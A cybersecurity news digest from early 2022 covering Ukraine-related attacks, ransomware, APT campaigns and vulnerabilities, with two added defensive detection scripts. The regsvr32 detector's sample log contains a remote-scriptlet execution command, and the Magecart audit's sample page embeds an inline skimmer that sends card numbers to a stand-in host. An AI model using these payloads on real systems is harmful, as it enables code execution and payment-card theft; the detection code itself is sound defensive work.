    The website for the Moscow Stock Exchange was offline and inaccessible on Monday. A crowdsourced community of hackers endorsed by Kyiv officials has claimed responsibility for the outage. The Ukraine IT Army posted a message on Telegram that it had taken just five minutes to render the site inaccessible. A spokesperson for global internet connectivity tracking company NetBlocks told Forbes: “We can confirm the Moscow Exchange website is down, but we don’t have visibility into the incident’s root cause or the extent of the disruption.” Ukraine’s deputy prime minister, Mykhailo Fedorov, announced the formation of the IT Army on Twitter last week and published a link to a list of prominent Russian websites for the hackers to target. On the hit list were the websites of 31 Russian businesses and state organizations, including those of energy company Gazprom, oil producer Lukoil, three banks and several government websites. Following the IT Army’s Telegram post, Fedorov posted the following message on social media: “The mission has been accomplished! Thank you!”

    100 Million Samsung Galaxy Phones Affected with Flawed Hardware Encryption Feature

    The shortcomings are the result of an analysis of the cryptographic design and implementation of Android's hardware-backed Keystore in Samsung's Galaxy S8, S9, S10, S20, and S21 flagship devices, researchers Alon Shakevsky, Eyal Ronen, and Avishai Wool said. Trusted Execution Environments (TEEs) are a secure zone that provide an isolated environment for the execution of Trusted Applications (TAs) to carry out security critical tasks to ensure confidentiality and integrity. On Android, the hardware-backed Keystore is a system that facilitates the creation and storage of cryptographic keys within the TEE, making them harder to extract from the device and preventing the underlying operating system from having direct access to them.

    Destructive Malware Targeting Organizations in Ukraine

    The CISA and FBI joint advisory gives a high-level summary of the destructive malware being used, including both WhisperGate and HermeticWiper, against organizations in Ukraine to destroy computer systems and render them inoperable. It also includes open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware from impacting their networks. Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data.

    Anonymous Hacking Group Declares “Cyber War” Against Russia

    The well-known international hacking collective made the announcement on its Twitter account on Thursday, shortly after the Kremlin commenced military action. The message read: “The Anonymous collective is officially in cyber war against the Russian government. #Anonymous #Ukraine.” Shortly after, the group claimed responsibility for taking down Russian government websites, including the Kremlin and State Duma.

    CISA Issues MuddyWater Warning

    Authorities in the UK and United States have issued an alert regarding a group of Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater. The actors, who are also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, have been observed conducting cyber espionage and other malicious cyber operations in Asia, Africa, Europe and North America.

    TrickBot Gang Likely Shifting Operations to Switch to New Malware

    TrickBot, the infamous Windows crimeware-as-a-service (CaaS) solution that's used by a variety of threat actors to deliver next-stage payloads like ransomware, appears to be undergoing a transition of sorts, with no new activity recorded since the start of the year. The lull in the malware campaigns is "partially due to a big shift from Trickbot's operators, including working with the operators of Emotet," researchers from Intel 471 said in a report shared with The Hacker News.

    CISA Warns of Actively Exploited Vulnerabilities in Zabbix Servers

    A notification from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns that threat actors are exploiting vulnerabilities in the Zabbix open-source tool for monitoring networks, servers, virtual machines, and cloud services. The agency is asking federal agencies to patch any Zabbix servers against security issues tracked as CVE-2022-23131 and CVE-2022-23134, to avoid “significant risk” from malicious cyber actors.

    Ukraine Links Phishing Targeting Armed Forces to Belarusian Hackers

    The Computer Emergency Response Team of Ukraine (CERT-UA) warned today of a spear phishing campaign targeting private email accounts belonging to Ukrainian armed forces personnel. CERT-UA's report attributes this ongoing phishing campaign to the UNC1151 threat group, linked by Mandiant researchers with high confidence in November 2021 to the Belarusian government.

    Deadbolt Ransomware Targets Asustor and QNap NAS Devices

    Storage solutions provider Asustor is warning its customers of a wave of Deadbolt ransomware attacks targeting its NAS devices. Since January, DeadBolt ransomware operators have been targeting QNAP NAS devices worldwide, and they claim to have a zero-day exploit that allows them to encrypt the content of the infected systems.

    9-Year-Old Unpatched Email Hacking Bug Uncovered in Horde Webmail Software

    Users of Horde Webmail are being urged to disable a feature to contain a nine-year-old unpatched security vulnerability in the software that could be abused to gain complete access to email accounts simply by previewing an attachment. Horde Webmail is a free, browser-based communication suite that allows users to read, send, and organize email messages as well as manage and share calendars, contacts, tasks, notes, files, and bookmarks.

    New Wiper Malware Targeting Ukraine Amid Russia's Military Operation

    Cybersecurity firms ESET and Broadcom's Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country. The Slovak company dubbed the wiper "HermeticWiper" (aka KillDisk.NCV), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months.

    Citibank Phishing Baits Customers With Fake Suspension Alerts

    An ongoing large-scale phishing campaign is targeting customers of Citibank, requesting recipients to disclose sensitive personal details to lift alleged account holds. The campaign uses emails that feature CitiBank logos, sender addresses that look genuine at first glance, and content that is free of typos.

    Devious Phishing Method Bypasses MFA Using Remote Access Software

    One of the biggest obstacles to successful phishing attacks is bypassing multi-factor authentication (MFA) configured on the targeted victim's email accounts. Even if threat actors can convince users to enter their credentials on a phishing site, if MFA protects the account, fully compromising the account still requires the one-time passcode sent to the victim.

    Entropy Ransomware Linked to Dridex Malware Downloader

    Analysis of the recently-emerged Entropy ransomware reveals code-level similarities with the general-purpose Dridex malware that started as a banking trojan. Two Entropy ransomware attacks against different organizations allowed researchers to connect the dots and establish a connection between the two pieces of malware.

    Revamped CryptBot Malware Spread by Pirated Software Sites

    A new version of the CryptBot info stealer was seen in distribution via multiple websites that offer free downloads of cracks for games and pro-grade software. CryptBot is a Windows malware that steals information from infected devices, including saved browser credentials, cookies, browser history, cryptocurrency wallets, credit cards, and files. The latest version features new capabilities and optimizations, while the malware authors have also deleted several older functions to make their tool leaner and more efficient.

    Expeditors International Impacted by Cyberattack

    Expeditors is a Fortune 500 logistics company headquartered in Seattle, Washington, United States of America. Expeditors provides efficient and tailored supply chain solutions to customers through a worldwide network of over 350 facilities in over 100 countries and across six continents. Expeditors International was targeted in a cyberattack forcing the corporation to shut down the majority of its global operations. As reported by Bleeping Computer, the effect was substantial, since Expeditors’ operations, which comprise freight, customs, and distribution, were constrained.

    Weekly Video Update for the Week of February 14, 2022

    This week has been pretty quiet; aside from a couple of things, we've been providing our members with continuous updates on the Ukraine and Russia situation and sharing any relevant news we've come across. We are monitoring the status closely as well as our various business partners. There is a grave concern with a possible fallout from the Ukraine and Russia geopolitical situation. Although a fairly common practice and observed on the threat landscape regularly, several financial institutions were implicated in DDoS in Ukraine, and ones in Canada also experienced some downtime this week.

    Ukrainian DDoS Attacks Should Put US on Notice–Researchers

    On Tuesday, institutions central to Ukraine’s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. The strike itself had limited impact — but the larger implications for critical infrastructure beyond the Ukraine are worth noting, researchers said.

    Hackers Can Crash Cisco Secure Email Gateways Using Malicious Emails

    Cisco has addressed a high severity vulnerability that could allow remote attackers to crash Cisco Secure Email appliances using maliciously crafted email messages. This bug is due to an insufficient error handling issue in DNS name resolution found and reported to Cisco by Rijksoverheid Dienst ICT Uitvoering (DICTU) security researchers.

    Hackers Attach Malicious .exe Files to Teams Conversations

    Starting in January 2022, Avanan observed how hackers are dropping malicious executable files in Teams conversations. The file writes data to the Windows registry, installs DLL files and creates shortcut links that allow the program to self-administer. Avanan has seen thousands of these attacks per month. In this attack brief, Avanan will analyze how these .exe files are being used by hackers in Microsoft Teams. In this attack, hackers are attaching .exe files to Teams chats to install a Trojan on the end-user’s computer. The Trojan is then used to install malware.

    Canada's Major Banks go Offline in Mysterious Hours-long Outage

    Five major Canadian banks went offline for hours blocking access to online and mobile banking as well as e-transfers for customers. The banks reportedly hit by the outage include Royal Bank of Canada (RBC), BMO (Bank of Montreal), Scotiabank, and the Canadian Imperial Bank of Commerce (CIBC). Online banking and e-Transfers down for many: Canada's five major banks went offline yesterday impeding access to e-Transfers, online and mobile banking services for many.

    Researchers Warn of a New Golang-based Botnet Under Continuous Development

    Cybersecurity researchers have unpacked a new Golang-based botnet called Kraken that's under active development and features an array of backdoor capabilities to siphon sensitive information from compromised Windows hosts. "Kraken already features the ability to download and execute secondary payloads, run shell commands, and take screenshots of the victim's system," threat intelligence firm ZeroFox said in a report published Wednesday.

    APT Has Been Shooting RATs at Aviation for Years

    Researchers have identified an advanced persistent threat (APT) group responsible for a series of cyberespionage and spyware attacks against the aviation, aerospace, transportation and defense industries since at least 2017 that feature high-volume email campaigns using industry-specific lures.

    Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology

    Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:
    • Enforce multifactor authentication.
    • Enforce strong, unique passwords.
    • Enable M365 Unified Audit Logs.
    • Implement endpoint detection and response tools.

    From at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:

    High-Severity RCE Security Bug Reported in Apache Cassandra Database Software

    Researchers have revealed details of a now-patched high-severity security vulnerability in Apache Cassandra that, if left unaddressed, could be abused to gain remote code execution (RCE) on affected installations. Apache Cassandra is an open-source, distributed, NoSQL database management system for managing very large amounts of structured data across commodity servers.

    The Ukraine Cyber Crisis: We Should Prepare, But Not Panic

    In a summary on the current Ukraine situation from Mandiant's Sandra Joyce, she said the situation at hand could be a very big problem for everyone in various regions, not just Ukraine and Russia: “We believe that after attacking U.S. and French elections, Western media, the Olympics, and many other targets with limited repercussions, Russia is emboldened to use their most aggressive cyber capabilities throughout the West.”

    BlackCat (ALPHV) Claims Swissport Ransomware Attack, Leaks Data

    The BlackCat ransomware group, aka ALPHV, has claimed responsibility for the recent cyber-attack on Swissport that caused flight delays and service disruptions. The €3 billion revenue firm, Swissport, has a presence across 310 airports in 50 countries and provides cargo handling, maintenance, cleaning, and lounge hospitality services. BlackCat has now been seen by BleepingComputer to leak a minuscule set of terabytes of data supposedly obtained from the recent ransomware attack.

    Indicators of Compromise Associated with BlackByte Ransomware

    This joint Cybersecurity Advisory was developed by the Federal Bureau of Investigation (FBI) and the U.S. Secret Service (USSS) to provide information on BlackByte ransomware. As of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems, including physical and virtual servers.

    Warning Over Mysterious Hackers That Have Been Targeting Aerospace and Defence Industries for Years

    An unknown criminal hacking group is targeting organizations in the aviation, aerospace, defense, transportation and manufacturing industries with trojan malware, in attacks that researchers say have been going on for years. Dubbed TA2541 and detailed by cybersecurity researchers at Proofpoint, the persistent cyber-criminal operation has been active since 2017 and has compromised hundreds of organizations across North America, Europe, and the Middle East.

    NFL's San Francisco 49ers Hit By Blackbyte Ransomware Attack

    The NFL's San Francisco 49ers team is recovering from a cyberattack by the BlackByte ransomware gang who claims to have stolen data from the American football organization. The 49ers confirmed the attack in a statement to BleepingComputer and said it caused a temporary disruption to portions of their IT network. While the 49ers did not confirm whether hackers successfully deployed the ransomware, they said they are still in the process of recovering systems, indicating that devices were likely encrypted.

    Marketing Firm Exposes Lead Data

    Security researchers at Website Planet have discovered an unsecured Amazon S3 bucket containing the Personal Identifiable Information (PII) of millions of people. Inside the bucket were ten folders, containing around 6,000 files and totaling over 1GB of data. While most (approximately 99%) of the data belongs to American residents, some information relates to people living in Canada.

    Europe's Biggest Car Dealer Hit With Ransomware Attack

    One of Europe's biggest car dealers, Emil Frey, was hit with a ransomware attack last month, according to a statement from the company. The Swiss company showed up on the list of victims for the Hive ransomware on February 1 and confirmed that they were attacked in January. The company -- which has about 3,000 employees -- generated $3.29 billion in sales in 2020 thanks to a variety of automobile-related businesses. It was ranked as the number 1 car dealership in Europe based on revenue and the total number of vehicles for sale.

    Alleged Ransomware Attack Disrupted Operations at Slovenia’s Pop TV Station

    Last week, a cyberattack disrupted the operations of Pop TV, Slovenia's most popular TV channel. The attack, which was likely ransomware, impacted the channel's computer network and caused the cancellation of the evening edition of the 24UR daily news show. Slovenian news outlet Zurnal24 reported that Pop TV was hit by threat actors from abroad who attempted to extort money from the company in exchange for restoring its systems.

    Emergency Magento Update Fixes Zero-Day Bug Exploited in Attacks

    Magento is an e-commerce platform owned by Adobe, sold commercially as Adobe Commerce and available freely as Magento Open Source; it gives merchants hundreds of features for connecting with customers and selling their products. Adobe rolled out emergency updates for both Adobe Commerce and Magento Open Source to fix a critical vulnerability, tracked as CVE-2022-24086, that is being exploited in the wild.

    Apple Patches Actively Exploited WebKit Zero Day

    Apple has patched yet another zero-day vulnerability, this time in its WebKit browser engine, that threat actors are already actively exploiting to compromise iPhones, iPads and macOS devices. The zero-day, tracked as CVE-2022-22620, is a use-after-free bug: memory is accessed after it has been freed, which an attacker can turn into code execution.

    Ukraine Dismantles Social Media Bot Farm Spreading “Panic”

    The Ukrainian Security Service said on Tuesday that it shut down a bot farm that was spreading panic on social media and had also been used to send out bomb threats. Authorities said the bot farm was used to manage more than 18,000 bot accounts and that “organizers from Russia supervised the administrators of the bot farms.” Officials detained three suspects from the Lviv region. “Two of them used their flats as premises for bot farms, the third participant was responsible for technical maintenance,” officials said. Equipment seized from their premises included two sets of GSM gateways (with 92 and 375 online channels), 3,000 SIM cards, laptops, and accounting records.

    Moxa Customers Urged to Patch Five Vulnerabilities Found in Mxview Network Management Software

    Moxa users are being urged to upgrade MXview to version 3.2.4 or higher to remediate five vulnerabilities discovered by Claroty's Team82. The issues affect the Taiwanese company's MXview web-based network management system versions 3.x to 3.2.2 and, taken together, were scored 10.0 by ICS-CERT, its highest criticality score. According to Team82, an unauthenticated attacker successfully chaining two or more of these vulnerabilities could achieve remote code execution on any unpatched MXview server.

    These Cybercriminals Plant Criminal Evidence on Human Rights Defender, Lawyer Devices

    Cybercriminals are hijacking the devices of civil rights activists and planting "incriminating evidence" in covert cyberattacks, researchers warn. According to SentinelLabs, an advanced persistent threat (APT) group dubbed ModifiedElephant has been responsible for widespread attacks targeting human rights activists and defenders, academics, journalists, and lawyers across India. The APT is thought to have been in operation since at least 2012, and over the past decade ModifiedElephant has continually and persistently targeted specific, high-profile people of interest.

    CISA Urges Orgs to Patch Actively Exploited Windows SeriousSAM Bug

    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added another 15 security issues actively used in cyberattacks to its catalog of known exploited vulnerabilities. The most recent one, CVE-2021-36934 (SeriousSAM), is a Microsoft Windows SAM (Security Accounts Manager) vulnerability: overly permissive file ACLs let any local user read the Registry hive files, including the SAM database, on Windows 10 and 11, extract password hashes and escalate to administrator privileges.

    FritzFrog P2P Botnet Attacking Healthcare, Education and Government Sectors

    A peer-to-peer Golang botnet has resurfaced after more than a year to compromise servers belonging to entities in the healthcare, education, and government sectors within a span of a month, infecting a total of 1,500 hosts. Dubbed FritzFrog, "the decentralized botnet targets any device that exposes an SSH server — cloud instances, data center servers, routers, etc. — and is capable of running any malicious payload on infected nodes," Akamai researchers said in a report shared with The Hacker News.

    Molerats Hackers Deploy New Malware in Highly Evasive Campaign

    The Palestinian-aligned APT group tracked as TA402 (aka Molerats) was spotted using a new implant named 'NimbleMamba' in a cyber-espionage campaign that leverages geofencing and URL redirects to legitimate websites. The campaign was discovered by Proofpoint, whose analysts observed three variations of the infection chain, all targeting governments in Middle Eastern countries, foreign policy think tanks, and a state-owned airline.

    Attackers Increasingly Adopting Regsvr32 Utility Execution Via Office Documents

    The Uptycs threat research team has observed a sharp increase in the use of regsvr32.exe launched from various types of Microsoft Office documents. Regsvr32 is a Microsoft-signed command line utility in Windows that registers and unregisters DLLs (Dynamic Link Libraries): registering a DLL adds information about it to the Windows Registry so that other programs can use the functionality it exports. Because it is a trusted, signed Windows binary that will happily load an arbitrary DLL or remote scriptlet, attackers use it to run their payload while slipping past application allow-listing and naive process-name detections.
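    The detection a practitioner wants here is not "regsvr32 ran" but "regsvr32 ran in a way a software installer never would". The following is an added example, not code from the Uptycs research; the log lines are constructed, and the tab-separated record layout (timestamp, parent image, image, command line) is an assumption to be mapped onto your EDR or Sysmon Event ID 1 fields.

```python
"""Flag abusive regsvr32.exe launches in process-creation telemetry.

Added example; it is not code from the Uptycs research. The log lines below
are constructed, and the record layout (tab-separated: timestamp, parent
image, image, command line) is an assumption to adapt to your EDR or Sysmon
Event ID 1 fields.
"""
import re

# Office applications whose documents commonly carry the macro/OLE lure.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# scrobj.dll with /i:<url> is the scriptlet ("squiblydoo") trick; a DLL in a
# user-writable location is the plain "register my dropped DLL" case.
SCROBJ_RE = re.compile(r"scrobj\.dll", re.IGNORECASE)
REMOTE_RE = re.compile(r"/i:\s*[\"']?(https?|ftp)://", re.IGNORECASE)
USER_PATH_RE = re.compile(
    r"\\(appdata|temp|tmp|public|programdata|downloads)\\", re.IGNORECASE
)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    ts, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}


def regsvr32_reasons(ev):
    """Return the reasons this event is suspicious (empty list if benign)."""
    if basename(ev["image"]) != "regsvr32.exe":
        return []
    reasons = []
    if basename(ev["parent"]) in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    if SCROBJ_RE.search(ev["cmdline"]):
        reasons.append("loads scrobj.dll (scriptlet execution)")
    if REMOTE_RE.search(ev["cmdline"]):
        reasons.append("remote /i: target")
    if USER_PATH_RE.search(ev["cmdline"]):
        reasons.append("DLL in a user-writable directory")
    return reasons


def detect(lines):
    """Return [(timestamp, reasons)] for every event worth an alert."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        reasons = regsvr32_reasons(ev)
        if reasons:
            hits.append((ev["ts"], reasons))
    return hits


# Constructed telemetry: one benign installer run, two abuse patterns, one unrelated process.
SAMPLE_LOG = [
    "2022-02-10T09:01:07Z\tC:\\Windows\\System32\\msiexec.exe\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32.exe /s C:\\Program Files\\Vendor\\vendor.dll",
    "2022-02-10T09:03:41Z\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32.exe /s C:\\Users\\bob\\AppData\\Local\\Temp\\invoice.dll",
    "2022-02-10T09:03:42Z\tC:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll",
    "2022-02-10T09:05:00Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe",
]

if __name__ == "__main__":
    for ts, reasons in detect(SAMPLE_LOG):
        print(ts, "; ".join(reasons))
```

    The parent-process rule alone catches the Office-document case the report describes; the scrobj.dll and remote-target rules catch the same binary when it is launched from a shortcut or script instead, so keep all of them even if your environment only sees one today.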

    Wave of MageCart Attacks Target Hundreds of Outdated Magento Sites

    Analysts have traced a mass breach of over 500 e-commerce stores running the Magento 1 platform, which reached end of life in June 2020, to a single domain that loaded a credit card skimmer on all of them. According to Sansec, the attack became evident late last month when its crawler discovered 374 infections on the same day, all using the same malware. The domain from which the threat actors loaded the malware is currently offline; the goal was to steal the credit card information of customers shopping on the targeted stores.
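    The tell in this campaign was a script origin the shops did not control. The check below is an added example, not code from Sansec or Magento: it collects every script on a storefront page, flags external origins that are not on the shop's own allow-list, and applies a second, heuristic test to inline scripts that touch payment fields and send data off-page. The HTML and the allow-list are constructed.

```python
"""Audit the script origins on a storefront page against an allow-list.

Added example, not code from Sansec or Magento. The HTML and the allow-list
are constructed. A skimmer has to be loaded from somewhere, so an unknown
script origin is the primary alert; an inline script that reads card fields
and exfiltrates is the secondary, heuristic one.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the shop's own origins. Relative src paths are same-origin.
ALLOWED_HOSTS = {"shop.example", "static.shop.example"}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


# Heuristic only: payment-field access combined with an exfiltration primitive.
FIELD_HINTS = ("card", "cvv", "cc_number", "document.forms", "queryselector")
EXFIL_HINTS = ("new image", "fetch(", "xmlhttprequest", "sendbeacon", "atob(")


def looks_like_skimmer(body):
    text = body.lower()
    return any(h in text for h in FIELD_HINTS) and any(h in text for h in EXFIL_HINTS)


def audit_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return [(kind, detail)]: unknown external origins and skimmer-like inline code."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for src in p.external:
        host = urlparse(src).hostname  # None for relative (same-origin) paths
        if host and host.lower() not in allowed_hosts:
            findings.append(("external", host.lower()))
    for body in p.inline:
        if looks_like_skimmer(body):
            findings.append(("inline", body.strip()[:40]))
    return findings


# Constructed page: one same-origin script, one allowed CDN, one unknown loader
# domain, and an inline script that posts the card number to that domain.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://static.shop.example/checkout.js"></script>
<script src="//cdn-loader.example/js/analytics.js"></script>
</head><body>
<script>
document.querySelector('form[name=checkout]').addEventListener('submit', function () {
  new Image().src = 'https://cdn-loader.example/g?d=' + btoa(document.forms[0].cc_number.value);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_HTML):
        print(kind, detail)
```

    Run this against the checkout page specifically, not just the home page, and run it from a browser-like fetch rather than from the server's own files: a skimmer injected at the database or template layer only shows up in the rendered HTML.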

    PHP Everywhere RCE Flaws Threaten Thousands of WordPress Sites

    Researchers found three critical remote code execution (RCE) vulnerabilities in the 'PHP Everywhere' plugin for WordPress, used by over 30,000 websites worldwide. PHP Everywhere is a plugin that allows WordPress admins to insert PHP code in pages, posts, the sidebar, or any Gutenberg block, and use it to display dynamic content based on evaluated PHP expressions.

    Fake Windows 11 Upgrade Installers Infect You With RedLine Malware

    Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware. The timing of the attacks coincides with the moment that Microsoft announced Windows 11's broad deployment phase, so the attackers were well-prepared for this move and waited for the right moment to maximize their operation's success. RedLine stealer is currently the most widely deployed password, browser cookies, credit card, and cryptocurrency wallet info grabber, so its infections can have dire consequences for the victims.

    Ransomware Dev Releases Egregor, Maze Master Decryption Keys

    The Maze ransomware operation began in May 2019 and quickly rose to notoriety for pioneering the data theft and double-extortion tactics now used by many ransomware operations. Its members rebranded as Egregor in September 2020, as Maze was winding down ahead of its October 2020 shutdown announcement, and Egregor in turn disappeared after members were arrested in Ukraine.

    Trends Show Increased Globalized Threat of Ransomware

    In 2021, cybersecurity authorities in the United States, Australia, and the United Kingdom observed an increase in sophisticated, high-impact ransomware incidents against critical infrastructure organizations globally. The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) observed incidents involving ransomware against 14 of the 16 U.S. critical infrastructure sectors, including the Defense Industrial Base, Emergency Services, Food and Agriculture, Government Facilities, and Information Technology Sectors. The Australian Cyber Security Centre (ACSC) observed continued ransomware targeting of Australian critical infrastructure entities, including in the Healthcare and Medical, Financial Services and Markets, Higher Education and Research, and Energy Sectors.

    Kimsuky Hackers Use Commodity RATs With Custom Gold Dragon Malware

    South Korean researchers have spotted a new wave of activity from the Kimsuky hacking group, involving commodity open-source remote access tools dropped alongside its custom backdoor, Gold Dragon. Kimsuky is a North Korean state-sponsored hacking group, also tracked as TA406, that has been actively involved in cyber-espionage campaigns since 2017. The group has demonstrated impressive operational versatility and a broad range of activity, engaging in malware distribution, phishing, data collection, and even cryptocurrency theft.

    FBI Warns of Criminals Escalating SIM Swap Attacks to Steal Millions

    The Federal Bureau of Investigation (FBI) says criminals have escalated SIM swap attacks to steal millions by hijacking victims' phone numbers. According to reports received by the FBI through the Internet Crime Complaint Center (IC3), the number of complaints from the US public and the reported losses in 2021 increased almost fivefold compared with 2018. The FBI's warning comes after the US Federal Communications Commission (FCC) announced in October that it had started working on rules to curb SIM swapping attacks.

    Several Malware Families Using Pay-Per-Install Service to Expand Their Targets

    A detailed examination of a Pay-per-install (PPI) malware service called PrivateLoader has revealed its crucial role in the delivery of a variety of malware such as SmokeLoader, RedLine Stealer, Vidar, Raccoon, and GCleaner since at least May 2021. Loaders are malicious programs used for loading additional executables onto the infected machine. With PPI malware services such as PrivateLoader, malware operators pay the service owners to get their payloads "installed" based on the targets provided.

    Hackers Are Using These Old Software Flaws to Deliver Ransomware

    Cybersecurity researchers at Digital Shadows have detailed several vulnerabilities that appeared last year – or that are even older and continue to be left unpatched and exploited – which may have been missed and continue to provide opportunities for cyber criminals. Failure to patch these vulnerabilities could have potentially dangerous consequences for businesses as malicious hackers exploit them to launch ransomware attacks, malware campaigns and other cyber-criminal activity.

    Palestinian Hackers Use New NimbleMamba Implant In Recent Attacks

    An advanced persistent threat (APT) hacking group operating with motives that likely align with Palestine has embarked on a new campaign that leverages a previously undocumented implant called NimbleMamba. The intrusions leveraged a sophisticated attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline, enterprise security firm Proofpoint said in a report, attributing the covert operation to a threat actor tracked as Molerats (aka TA402).

    Medusa Android Banking Trojan Spreading Through Flubot's Attacks Network

    Two different Android banking Trojans, FluBot and Medusa, are relying on the same delivery vehicle as part of a simultaneous attack campaign, according to new research published by ThreatFabric. The ongoing side-by-side infections, facilitated through the same smishing (SMS phishing) infrastructure, involved the overlapping usage of "app names, package names, and similar icons," the Dutch mobile security firm said.

    FBI Releases PIN Indicators of Compromise Associated with LockBit 2.0 Ransomware

    LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation. LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including, but not limited to, purchased access, unpatched vulnerabilities, insider access, and zero day exploits.

    Law Enforcement Actions Push Ransomware Gangs to Surgical Attacks

    The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations. Most of the notorious Ransomware-as-a-Service (RaaS) gangs continue their operations even after the law enforcement authorities have arrested key members but have refined their tactics for maximum impact.

    Hackers Breached a Server of National Games of China Days before the Event

    Researchers at cybersecurity firm Avast discovered that a Chinese-language-speaking threat actor compromised systems at the 2021 National Games of China. The event, a national version of the Olympics for domestic athletes, took place on September 15, 2021 in Shaanxi, China. The attackers breached a web server on September 3 and deployed multiple reverse web shells to establish a permanent foothold in the target network.

    Russian Gamaredon APT Has Been Targeting Ukraine Since October

    The Russia-linked cyberespionage group Gamaredon (aka Armageddon, Primitive Bear, and ACTINIUM) has been behind spear-phishing attacks targeting Ukrainian entities and organizations related to Ukrainian affairs since October 2021, Microsoft said. This week, Palo Alto Networks’ Unit 42 reported that the group attempted to compromise an unnamed Western government entity operating in Ukraine in January, as geopolitical tensions between Russia and Ukraine escalated dramatically.

    US Telecom Providers Requested $5.6B to Replace Chinese Equipment

    The U.S. government has required telecom providers to replace Chinese equipment in their networks because of security concerns and allocated $1.9 billion to support the companies through the transition. The Federal Communications Commission (FCC) said that amount is not enough: small telecom providers have requested $5.6 billion to replace Chinese gear. Telecom companies also face the global chip shortage, which is disrupting the supply chain for replacement networking equipment.

    PowerPoint Files Abused to Take Over Computers

    Attackers are using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings to take over an end user’s computer, researchers have found. It’s one of a number of stealthy ways threat actors recently have been targeting desktop users through trusted applications they use daily, using emails that are designed to evade security detections and appear legitimate.

    Intuit Warns of Phishing Emails Threatening to Delete Accounts

    Accounting and tax software provider Intuit has notified customers of an ongoing phishing campaign impersonating the company and trying to lure victims with fake warnings that their accounts have been suspended. Intuit's alert follows reports received from customers who were emailed and told that their Intuit accounts were disabled following a recent server security upgrade.

    New Malware Used by SolarWinds Attackers Went Undetected for Years

    The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once again indicative of the elusive nature of the campaigns and the adversary's ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light.

    China Condemns US Ban on Telco, Urges Need for Fair Treatment

    Beijing has lashed out at the US government's decision to ban China Unicom from offering its services in the US, describing the move as baseless. It vows to safeguard the "legitimate rights and interests" of Chinese businesses operating in the US market. China's Ministry of Industry and Information Technology (MIIT) said it strongly opposed a move by the US Federal Communications Commission (FCC) to revoke China Unicom's license, effectively banning the state-owned Chinese telco from providing services in the US market.

    Hacker Group 'Moses Staff' Using New StrifeWater RAT in Ransomware Attacks

    A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware "StrifeWater."

    Experts Found 23 Flaws in UEFI Firmware That Potentially Impact Millions of Devices

